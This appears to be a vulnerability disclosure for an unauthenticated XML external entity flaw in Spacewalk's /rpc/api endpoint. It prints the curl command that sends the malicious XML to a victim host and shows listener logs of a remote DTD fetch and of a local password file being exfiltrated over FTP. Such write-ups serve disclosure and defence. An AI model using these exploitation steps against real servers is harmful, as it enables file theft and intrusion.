A flaw was found in Spacewalk up to version 2.9 where it was vulnerable to XML internal entity attacks via the /rpc/api endpoint. An unauthenticated remote attacker could use this flaw to retrieve the content of certain files and trigger a denial of service, or in certain circumstances, execute arbitrary code on the Spacewalk server.
Local file read
XML-RPC call for final exploit
curl -X POST -sik https://victim.tld/rpc/api -H ‘Content-Type: application/xml’ –data @xxe-ftp-exfil.xml
After execution and running an FTP listener, you will see the remote DTD fetch, along with the following exfiltration of the local file.
"GET /external.dtd HTTP/1.1" 200 448 "-" "Java/1.8.0_151" 2020/02/17 00:00:00 [*] Connection Accepted from [x.x.x.x:00000] USER: anonymous PASS: Java1.8.0_151@ /root:x:0:0:root: /root: /bin 2020/02/17 00:00:00 [*] Closing FTP Connection